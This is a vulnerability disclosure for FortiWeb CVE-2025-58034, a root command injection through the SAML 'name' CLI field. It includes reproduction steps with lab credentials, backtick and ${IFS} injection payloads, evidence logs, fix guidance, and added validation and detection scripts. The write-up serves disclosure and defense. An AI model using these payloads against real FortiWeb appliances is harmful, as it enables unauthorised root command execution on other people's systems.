@N3mes1s
Created November 20, 2025 14:55

FortiWeb CVE-2025-58034 – SAML name command injection (root RCE)

Summary

  • Product / Component: FortiWeb 7.6.1 (Docker image fortiweb/fortiweb-swarm:latest) – SAML CLI handler (oper_user_saml_part_0saml_utils.sh)
  • Impact: Authenticated admin can inject shell commands via SAML “name” and achieve root command execution on the appliance
  • Introduced: Present in FortiWeb 7.6.1 (prior to vendor fix; exact commit not available)
  • Fixed: Patched in FortiWeb 7.6.6 / 8.0.2 per FG-IR-25-513 (adds saml_name_check validation)
  • Reproduction Status: Confirmed on FortiWeb-Docker 7.6.1, build1010(GA.F), running in the provided Lima/Docker context
  • Customer Action: Upgrade to 7.6.6+ (or vendor-recommended fixed trains), restrict admin access paths, and monitor SAML configuration changes

Root Cause

The SAML configuration “name” is interpolated directly into a shell command that invokes saml_utils.sh via system/fwbsystem without validation. Because the CLI accepts backtick-wrapped names, an attacker can embed shell syntax that runs as root when the CLI executes the helper script.

# oper_user_saml_part_0 (invocation)
/bin/sh /data/etc/saml/shibboleth/saml_utils.sh -a addsp -i <name> ...
# <name> is taken verbatim from CLI input; no sanitization before execution

This allows crafting a SAML server name like `/bin/touch /tmp/pwn` to execute arbitrary commands as root on the appliance.
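
The following is an added illustration, not FortiWeb code and not taken from the advisory: a conservative allowlist check in the spirit of the `saml_name_check` the vendor describes, placed next to the two ways a name can reach a helper script. The allowed character set is an assumption (Fortinet has not published its rule), and `printf` stands in for `saml_utils.sh` so the snippet runs offline. The unsafe path only demonstrates the `${IFS}` word-splitting shape used in this report; it does not execute anything from the name.

```shell
#!/bin/sh
# Added example, not FortiWeb code: an allowlist check in the spirit of the
# vendor's saml_name_check, next to the two ways of handing a name to a helper.
# The allowed charset is an assumption; the advisory does not publish the rule.

# Return 0 only for names made of letters, digits, '_', '.' and '-'.
saml_name_check() {
    case "$1" in
        "")                 return 1 ;;   # empty name
        *[!A-Za-z0-9_.-]*)  return 1 ;;   # any byte outside the allowlist
        *)                  return 0 ;;
    esac
}

# Unsafe pattern from the root-cause section: the name is spliced into a
# command string that a second shell re-parses, so ${IFS}, backticks and ';'
# in the value are interpreted. printf stands in for saml_utils.sh here.
run_unsafe() {
    sh -c "printf 'name=%s\n' $1"
}

# Hardened pattern: validate first, then pass the name as one positional
# argument; the inner shell quotes "$1" and never re-parses its content.
run_safe() {
    saml_name_check "$1" || { printf 'rejected: %s\n' "$1" >&2; return 1; }
    sh -c 'printf "name=%s\n" "$1"' _ "$1"
}

# Stand-alone demonstration with the IFS-splitting shape used in the report.
main() {
    run_unsafe 'sp1${IFS}extra'          # two lines: the value was word-split
    run_safe   'sp1${IFS}extra' || true  # rejected by the allowlist
    run_safe   'sso-okta'                # prints name=sso-okta
}
main
```

The important design point is the second function: once the name is passed as its own argument vector element, quoting inside the helper is no longer what stands between the admin input and the shell, and the allowlist becomes a defense-in-depth layer rather than the only one.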

Fix Diff Highlights

Vendor fix (per advisory) adds saml_name_check to reject unsafe SAML names before constructing the saml_utils.sh command:

- saml_utils.sh -a addsp -i "$saml_name" ...
+ saml_name_check "$saml_name" || exit 1
+ saml_utils.sh -a addsp -i "$saml_name" ...
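
Review bot: the guard on the `+ saml_name_check "$saml_name" || exit 1` line only helps if it runs before any shell has parsed the name. The root-cause section states that the name is spliced into the command string that system/fwbsystem executes, so by the time saml_utils.sh receives `$saml_name` a backtick or `${IFS}` sequence in it has already been interpreted; the check (and the quoting) belongs in the caller that builds the command, ideally replaced by an argument-vector exec so no command string is built at all. Two smaller points: `saml_name_check` should be an allowlist (letters, digits, `_`, `-`, `.`) rather than a metacharacter denylist, and since the paragraph after the hunk says no upstream source diff was available, the hunk should be labelled as a reconstruction from FG-IR-25-513 above the lines rather than only below them.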

No upstream source diff was available in this bundle; guidance is based on FG-IR-25-513.

Release Status & History

  1. 2025-11-20 – Reproduced on FortiWeb-Docker 7.6.1 build1010(GA.F); root-owned marker file created via SAML CLI name injection.
  2. Vendor advisory FG-IR-25-513 – Fix shipped in 7.6.6 / 8.0.2 (date per vendor bulletin); earlier 7.6.0–7.6.5 remain vulnerable.

Reproduction

Prereqs: running FortiWeb container fortiweb-7-6-1 on Lima host (SSH on 38022), credentials admin / FortiWeb!123, sshpass installed.

# From bundle root:
cd repro
chmod +x reproduction_steps.sh
FORTIWEB_HOST=host.lima.internal FORTIWEB_SSH_PORT=38022 \
FORTIWEB_USERNAME=admin FORTIWEB_PASSWORD=FortiWeb!123 \
./reproduction_steps.sh

The script:

  • Resolves reachable host (host.lima.internal or localhost)
  • Sends SAML CLI payload via SSH to set name to `/bin/touch${IFS}/tmp/<marker>`
  • Verifies root-owned marker with fnsysctl ls -l /tmp/<marker>
  • Captures system status

Evidence

# ssh CLI transcript (repro/logs/repro.log)
... saml_utils.sh -a addsp ... (usage banner) ...
Failed to merge the SAML server's configurations.
Command fail. Invalid input value.
[+] SSH command exit status: 0

# Marker verification (repro/logs/marker_verification.log)
-rw-r--r--    1 0        0       ... /tmp/pcli176364935910647
[+] Root-owned marker file /tmp/pcli176364935910647 confirmed

# System status (FortiWeb build)
International Version: FortiWeb-Docker 7.6.1,build1010(GA.F),241126
Hostname: 1ee6302afefd

Recommendations

  1. Patch: Upgrade FortiWeb to 7.6.6+ (or 8.0.2+). Do not run 7.6.0–7.6.5 in production.
  2. Config: Restrict admin/CLI access (SSH and web “CLI Console”); monitor SAML name changes for shell metacharacters; disable SAML CLI operations where possible.
  3. Defense-in-depth: Add WAF/IPS rules to block malformed SAML config names; alert on creation of unexpected files under /tmp on FortiWeb nodes; enforce MFA and network isolation for admin interfaces.
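
As an added example of the second recommendation (monitoring SAML name changes for shell metacharacters), the following script is not part of the report and does not use a real FortiWeb log format: the audit line layout and the `config user saml-user` / `edit <name>` command shapes are constructed for the example, and the allowlist regex is an assumption. The script tracks which config block an admin session is in and flags only `edit` names inside a SAML block, so interface or policy names with unusual characters do not generate noise.

```shell
#!/bin/sh
# Added example, not from the report or Fortinet: triage admin CLI audit lines
# for SAML names that carry shell metacharacters. The line format below is
# constructed for this example; adapt the regexes to the real audit source.

# Constructed sample: one admin session editing SAML users, one name with the
# ${IFS} payload shape from the report, one with backticks, plus unrelated
# activity from a second operator.
AUDIT_SAMPLE='2025-11-20T14:55:01Z user=admin src=10.0.0.5 cmd="config user saml-user"
2025-11-20T14:55:02Z user=admin src=10.0.0.5 cmd="edit sso-okta"
2025-11-20T14:55:03Z user=admin src=10.0.0.5 cmd="edit /bin/touch${IFS}/tmp/marker"
2025-11-20T14:55:04Z user=admin src=10.0.0.5 cmd="edit `id`"
2025-11-20T14:55:05Z user=admin src=10.0.0.5 cmd="end"
2025-11-20T14:55:06Z user=ops src=10.0.0.9 cmd="config system interface"
2025-11-20T14:55:07Z user=ops src=10.0.0.9 cmd="edit port1"'

# Read audit lines on stdin; print "ALERT <line>" for every "edit <name>"
# issued inside a SAML config block whose name falls outside the allowlist.
# A new config block or "end" leaves SAML scope.
scan_saml_audit() {
    awk '
        /cmd="config [^"]*saml/          { in_saml = 1; next }
        /cmd="config / || /cmd="end"/     { in_saml = 0; next }
        in_saml && match($0, /cmd="edit [^"]*"/) {
            # strip the 10-byte prefix cmd="edit  and the closing quote
            name = substr($0, RSTART + 10, RLENGTH - 11)
            if (name ~ /[^A-Za-z0-9_.-]/) print "ALERT " $0
        }
    '
}

# Wrapper over the embedded sample; prints the number of alerts raised.
count_sample_alerts() {
    printf '%s\n' "$AUDIT_SAMPLE" | scan_saml_audit | wc -l | tr -d ' '
}

printf '%s\n' "$AUDIT_SAMPLE" | scan_saml_audit
```

Run against the sample it prints two ALERT lines (the `${IFS}` name and the backtick name) and stays silent on `sso-okta` and on the interface edit. In production the same awk body would be fed from the appliance's admin audit export, and the alert line is what you would forward to a SIEM alongside the marker-file check from the third recommendation.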